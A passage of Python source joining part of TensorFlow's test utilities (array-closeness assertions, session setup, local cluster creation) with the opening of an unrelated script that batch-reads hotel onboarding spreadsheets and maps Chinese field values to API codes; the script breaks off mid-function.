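For example, an illustrative sketch inside a test method (the worker function
is hypothetical):
```python
def _worker(results):
  results.append(42)

results = []
t = self.checkedThread(target=_worker, args=(results,))
t.start()
t.join()  # Re-raised as a test failure if _worker raised an exception.
self.assertEqual([42], results)
```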
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| <= err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| <= err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
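For example, an illustrative sketch comparing nested structures:
```python
self.assertAllClose(
    {"w": [1.0, 2.0], "b": 0.5},
    {"w": np.array([1.0 + 1e-7, 2.0]), "b": 0.5 + 1e-7},
    rtol=1e-6, atol=1e-6)
```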
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is relaxed to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate lines. A line of ellipses (...) will be appended at the end if the
number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
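For example, an illustrative sketch with a regex and with a callable
predicate:
```python
with self.assertRaisesWithPredicateMatch(ValueError, "negative"):
  raise ValueError("negative values are not supported")

with self.assertRaisesWithPredicateMatch(
    ValueError, lambda e: "negative" in str(e)):
  raise ValueError("negative values are not supported")
```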
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used to
instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
|
batch_read_excel.py
|
#!/usr/local/Cellar/python/3.7.4_1/bin/python3
# -*- coding:utf-8 -*-
import sys, os, datetime, openpyxl, json, threading
from multiprocessing import Pool
data_dict = {
'0': { # hotel
'hotelType': {
'经济型': 1,
'主题': 2,
'商务型': 3,
'公寓': 4,
'客栈': 5,
'青年旅社': 6,
'度假酒店': 7,
'星级酒店': 8
},
'type': {
# '直营': 1,
# '加盟': 2,
# 'EGM': 4,
'千屿2.0': 5
},
'brandType': {
'千屿': 10,
'千寻': 11
}
},
'1': { # contacts
'type': { # contact type
'业主': 'owner',
'经理': 'manager',
'前台': 'receptionist',
'店长': 'hotel_manager',
'股东': 'shareholder',
'其他': 'others'
}
},
'2': { # OTA accounts
'type': { # OTA account type
'美团': 'meituan',
'携程': 'ctrip',
'去哪儿': 'qunar',
'艺龙': 'elong',
'飞猪': 'fliggy',
'阿里商旅': 'AliTmc'
}
},
'3': { # corporate legal entity
'type': { # company type
'有限责任公司(自然人独资)': 'company',
'个体商户': 'single',
'个体工商户': 'single',
'有限责任公司': 'limitedLiabilityCompany',
'个人独资企业': 'soleProprietorship',
'有限合伙': 'limitedPartnership',
'股份有限公司': 'incorporatedCompany',
'其他': 'others'
},
'certificateType': { # certificate type
'身份证': 'CERTIFICATE_01'
},
'accountType': { # receiving account type
'对公账户': 1,
'对公': 1,
'对私账户': 2,
'对私': 2,
'私人账户': 2
}
},
'4': { # rooms
'roomTypeId': { # room type
'标准大床房': 20,
'豪华大床房': 26,
'标准双床房': 29,
'豪华双床房': 30,
'三人房': 33,
'主题房': 34,
'特惠房': 51
},
'bedInfoId': {
'单人床1.0米': 1,
'单人床1.2米': 2,
'单人床1.35米': 3,
'单人床1.5米': 4,
'大床1.5米': 5,
'大床1.8米': 6,
'大床2.0米': 7,
'大床2.2米': 8,
'圆床2.0米': 9,
'圆床2.2米': 10,
'圆床2.4米': 11,
'圆床2.6米': 12,
'圆床2.8米': 13,
'方形水床1.5米': 14,
'方形水床1.8米': 15,
'方形水床2.0米': 16,
'方形水床2.2米': 17,
'原型水床2.0米': 18,
'原型水床2.2米': 19,
'原型水床2.4米': 20,
'原型水床2.6米': 21,
'原型水床2.8米': 22
}
},
'5': { # facilities
'a': 1003, # parking - paid
'b': 1004, # parking - free
'c': 1063, # no parking
'd': 176, # meeting room
'e': 3, # WiFi coverage
'f': 157, # restaurant
'g': 2029, # lounge area
'h': 180, # free toiletries
'i': 2024, # toiletries provided
'k': 10031, # free breakfast
'm': 10032, # paid breakfast
'n': 10033, # no breakfast
'o': 166, # pickup/drop-off service
'p': 170, # luggage storage
'q': 171, # wake-up call service
'r': 104, # laundry service
's': 160, # bank card payment
't': 70007, # Alipay
'u': 70008, # WeChat Pay
'v': 70009, # cash
},
'6': {
# 'accountType': {
# '对公': 1,
# '对公账户': 1,
# '对私账户': 2,
# '对私': 2,
# '私人账户': 2
# },
'idCardType': { # certificate type
'身份证': 'CERTIFICATE_01'
}
},
'env': {
'local': '127.0.0.1:5000',
'dev': 'http://backend-product-service.dev.ahotels.tech',
'test': 'http://backend-product-service.test.ahotels.tech',
'uat': 'http://ali.uat.ahotels.tech/product-service',
'prod': 'http://backend-product-service.ahotels.tech'
}
}
# Excel directory
dir = sys.argv[1]
# target environment
env = sys.argv[2]
# read one sheet
def get_sheet_data(sheet_data, index=None):
# all parsed rows
row_list = []
# row index
row_num = -1
# keys used for the JSON output
row_header = None
for row in sheet_data.rows:
row_num = row_num + 1
# field names
if row_num == 0:
row_header = [col.value for col in row]
continue
# skip the human-readable header row
if row_num == 1:
continue
# one row of data
row_data = {}
line_data = [col.value for col in row]
for i, value in enumerate(line_data):
key = row_header[i]
# skip columns whose key or value is empty
if key is None or value is None:
continue
if index is not None:
value_dict = data_dict.get(str(index), {}).get(key)
if value_dict is not None:
if isinstance(value_dict, dict):
temp_value = value_dict.get(value)
if temp_value is None:
print('不支持的字典: sheet=%s, key=%s, value=%s' % (index, key, value))
value = temp_value
else: # compatibility for the facilities sheet, whose structure differs from the other sheets
value = value_dict
# format dates
if isinstance(value, datetime.datetime):
value = value.strftime("%Y-%m-%d")
row_data[key] = value
if len(row_data.keys()) > 0:
row_list.append(row_data)
return row_list
# process the agreement sheet
def get_hotel_agreement(agreement):
not_null_list = ['totalTransCost', 'roomOyoTransCost', 'prepaymentRadio']
for not_null_key in not_null_list:
if not_null_key not in agreement or agreement.get(not_null_key) == '':
print('协议字段[%s]不能为空' % not_null_key)
for index, key in enumerate(agreement):
if agreement.get(key) == '非必填':
agreement[key] = ''
if key.endswith('Url') and agreement.get(key) == '':
agreement[key] = 'http://a'
urls = ['businessLicensePicUrl', 'frontIdCardPicUrl', 'bankCardUrl', 'partyAfrontIdCardPicUrl',
'reverseIdCardPicUrl']
for url in urls:
if url not in agreement:
agreement[url] = 'http://a'
# agreement type
agreement['projectType'] = 'ISLANDS_2'
agreement['commissionDateTypeName'] = '控价日'
mdm_audit_time_key = 'mdmAuditTime'
if mdm_audit_time_key not in agreement or agreement[mdm_audit_time_key] is None:
# current time + 8 hours, because it must be later than the submit time
mdm_audit_time = datetime.datetime.now() + datetime.timedelta(hours=8)
agreement[mdm_audit_time_key] = mdm_audit_time.strftime('%Y-%m-%d %H:%M:%S')
prepayment_radio = agreement['prepaymentRadio']
if prepayment_radio < 1:
prepayment_radio = prepayment_radio * 100
agreement['prepaymentRadio'] = prepayment_radio
agreement['guaranteeIncomes'] = [{
"month": "1",
"money": agreement.pop('janAmg'),
"vmgMoney": agreement.pop('janVmg')
}, {
"month": "2",
"money": agreement.pop('febAmg'),
"vmgMoney": agreement.pop('febVmg')
}, {
"month": "3",
"money": agreement.pop('marchAmg'),
"vmgMoney": agreement.pop('marchVmg')
}, {
"month": "4",
"money": agreement.pop('aprilAmg'),
"vmgMoney": agreement.pop('aprilVmg')
}, {
"month": "5",
"money": agreement.pop('mayAmg'),
"vmgMoney": agreement.pop('mayVmg')
}, {
"month": "6",
"money": agreement.pop('juneAmg'),
"vmgMoney": agreement.pop('juneVmg')
}, {
"month": "7",
"money": agreement.pop('julyAmg'),
"vmgMoney": agreement.pop('julyVmg')
}, {
"month": "8",
"money": agreement.pop('augustAmg'),
"vmgMoney": agreement.pop('augustVmg')
}, {
"month": "9",
"money": agreement.pop('septAmg'),
"vmgMoney": agreement.pop('septVmg')
}, {
"month": "10",
"money": agreement.pop('octAmg'),
"vmgMoney": agreement.pop('octVmg')
}, {
"month": "11",
"money": agreement.pop('noveAmg'),
"vmgMoney": agreement.pop('noveVmg')
}, {
"month": "12",
"money": agreement.pop('deceAmg'),
"vmgMoney": agreement.pop('deceVmg')
}]
return agreement
# Post-process the room information.
# The sheet stores rooms grouped by floor; this splits the room-number cell and combines it
# with the floor data (see the illustrative example after this function).
def get_rooms(floor_rooms, hotel_name):
ret_rooms = {}
room_num_check_list = []
room_sum = 0
print('<br>')
print(hotel_name)
print('<br>')
for index, room_type_floor in enumerate(floor_rooms):
room_nums = room_type_floor.get('roomNo')
row_index = index + 3
if room_nums is None:
continue
if isinstance(room_nums, int):
room_nums = str(room_nums)
room_nums = room_nums.replace('、', ',').replace(',', ',').replace('.', ',')
room_type_id = room_type_floor.get('roomTypeId')
if room_type_id is None:
print('<p style="color:red">' + hotel_name + ',第%s行,房型错误</p>' % row_index)
ret_room_type = ret_rooms.get(room_type_id, {
'roomTypeId': room_type_id,
